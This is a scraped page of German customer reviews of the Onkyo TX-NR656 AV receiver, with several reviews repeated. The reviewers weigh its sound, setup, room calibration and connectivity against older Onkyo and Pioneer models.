    Hierzu fehlen mir eigentlich die worte. Klang in verbindung mit einem harman karton hkts 30 5. Habe zwar die originalkabel der speaker tauschen müssen, aber um die geht es hier nicht. Das einrichten mit dem mitgelieferten mikro ist auch sehr einfach, überhaupt die ganze installation ist sehr einfach und teilweise selbsterklärend. Habe ich bei anderen herstellern schon anders gesehen. Die verarbeitung ist toll, die vielzahl an anschlussmöglichkeiten lässt keine wünsche offen und da auch wlan sowie bluetooth und die fähigkeit für multiroom mit an bord ist. Danke onkyodas alles für diesen preis ist echt beeindruckend.
    1. Für nutzer eines satelietensystems mag das gerät ausreichen, aber zum befeuern richtiger lautsprecher hat er leider nicht genug leistung. Ich habe das gerät gekauft um meinen alten tx er 508 ebenfalls von onkyo zu ersetzen. Leider ein glatter fehlkauf. Deutlich weniger druck trotz höherer leistungsangabe. Das neue einmesssystem accu irgendwas ist meines erachtens nach schlicht unbrauchbar. Völlig falsche einmessergebnisse, ein atmoslautsprecher korrekt eingewiesen,der darunter stehende hauptlautsprecher mit 3m. Das ist doch mal ne abweichung. Einmessung wiederholt,wieder ein desulates ergebnis,nahezu identisch, falsch. Ok messwerte manuel korrigiert und mit atmo s demo disc getestet.
  8. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Für nutzer eines satelietensystems mag das gerät ausreichen, aber zum befeuern richtiger lautsprecher hat er leider nicht genug leistung. Ich habe das gerät gekauft um meinen alten tx er 508 ebenfalls von onkyo zu ersetzen. Leider ein glatter fehlkauf. Deutlich weniger druck trotz höherer leistungsangabe. Das neue einmesssystem accu irgendwas ist meines erachtens nach schlicht unbrauchbar. Völlig falsche einmessergebnisse, ein atmoslautsprecher korrekt eingewiesen,der darunter stehende hauptlautsprecher mit 3m. Das ist doch mal ne abweichung. Einmessung wiederholt,wieder ein desulates ergebnis,nahezu identisch, falsch. Ok messwerte manuel korrigiert und mit atmo s demo disc getestet.
    1. Halloalso ich hatte vorher einen 9. 2 pioneer verstärker uvp 1499,- und ich kann hier nur sagen jeder der kein 9. 2 braucht ist in allen belangen beim onkyo besser dran. Sound ist klar besserbedienbarkeit ist klar besser(onkyo app ist spitze)habe das microfon gar nicht verwendet weil es nicht nötig war. Das display könnte schöner sein aber das ist geschmackssachealso wer einen verstärker für tollen 5. 1 sound braucht mit genug leistung und tip top bedienbarkeit ist beim onkyo super bedient.
  9. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Halloalso ich hatte vorher einen 9. 2 pioneer verstärker uvp 1499,- und ich kann hier nur sagen jeder der kein 9. 2 braucht ist in allen belangen beim onkyo besser dran. Sound ist klar besserbedienbarkeit ist klar besser(onkyo app ist spitze)habe das microfon gar nicht verwendet weil es nicht nötig war. Das display könnte schöner sein aber das ist geschmackssachealso wer einen verstärker für tollen 5. 1 sound braucht mit genug leistung und tip top bedienbarkeit ist beim onkyo super bedient.
  10. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Ich besaß vorher den onkyo tx-616, der mir aber leider aufgrund des bekannten fehlers des hdmi-boards nach gut vier jahren kaputt gegangen ist. Da ich, abgesehen davon, sehr zufrieden mit onkyo war sollte es also wieder einer sein. Dem ersten den ich bekommen habe, fehlte das onkyo-logo oben links, also zurückgeschickt und ein neuen bekommen. Sehr schnelle und gute abwicklung von amazon. Die erstinstallation über das neue entschlackte menü verlief problemlos, das obligatorische update für den dts:x-sound ging auch ziemlich schnell. Das integrierte wlan-board ist übrigens hervorragend und kein vergleich mit den wlan-sticks von onkyo, die ständig die verbindung verloren haben. Natürlich ist das automatische abmessen nie perfekt und es muss immer nachgeregelt werden. Auch hier ließen sich schnell sehr gute ergebnisse erzielen, die dem 616 in nichts nachstanden. Es gibt mal wieder eine bandbreite an guten musikformaten und -einstellungen. Auch das durchschleifen von 4k- inhalten über den arc-anschluss meines panasonic fernsehers ist hervorragend und liefert ein klares hochaufgelöstes ultra hd bild.
  11. Rezension bezieht sich auf : Onkyo TX-NR656 (B) 7.2-Kanal-A/V-Netzwerk-Receiver (160 W/Kanal,DTS: X aufrüstbar, Dolby Atmos, AirPlay, 384 kHz/32-Bit D/A-Wandler, 8 HDMI-Eingänge/2 Ausgänge) schwarz

    Ich besaß vorher den onkyo tx-616, der mir aber leider aufgrund des bekannten fehlers des hdmi-boards nach gut vier jahren kaputt gegangen ist. Da ich, abgesehen davon, sehr zufrieden mit onkyo war sollte es also wieder einer sein. Dem ersten den ich bekommen habe, fehlte das onkyo-logo oben links, also zurückgeschickt und ein neuen bekommen. Sehr schnelle und gute abwicklung von amazon. Die erstinstallation über das neue entschlackte menü verlief problemlos, das obligatorische update für den dts:x-sound ging auch ziemlich schnell. Das integrierte wlan-board ist übrigens hervorragend und kein vergleich mit den wlan-sticks von onkyo, die ständig die verbindung verloren haben. Natürlich ist das automatische abmessen nie perfekt und es muss immer nachgeregelt werden. Auch hier ließen sich schnell sehr gute ergebnisse erzielen, die dem 616 in nichts nachstanden. Es gibt mal wieder eine bandbreite an guten musikformaten und -einstellungen. Auch das durchschleifen von 4k- inhalten über den arc-anschluss meines panasonic fernsehers ist hervorragend und liefert ein klares hochaufgelöstes ultra hd bild.
    1. Bin begeistert von der leistung und von der klangqualität. Habe genau das bekommen was ich von dem av verstärker erwartet habe und sogar mehr . Klare kaufempfehlung, so viele einstellungen im untermenü für jeden angeschlossenen lautsprecher beeindruckende konfigurations möglichkeiten .
      1. Bin begeistert von der leistung und von der klangqualität. Habe genau das bekommen was ich von dem av verstärker erwartet habe und sogar mehr . Klare kaufempfehlung, so viele einstellungen im untermenü für jeden angeschlossenen lautsprecher beeindruckende konfigurations möglichkeiten .

Comments are closed.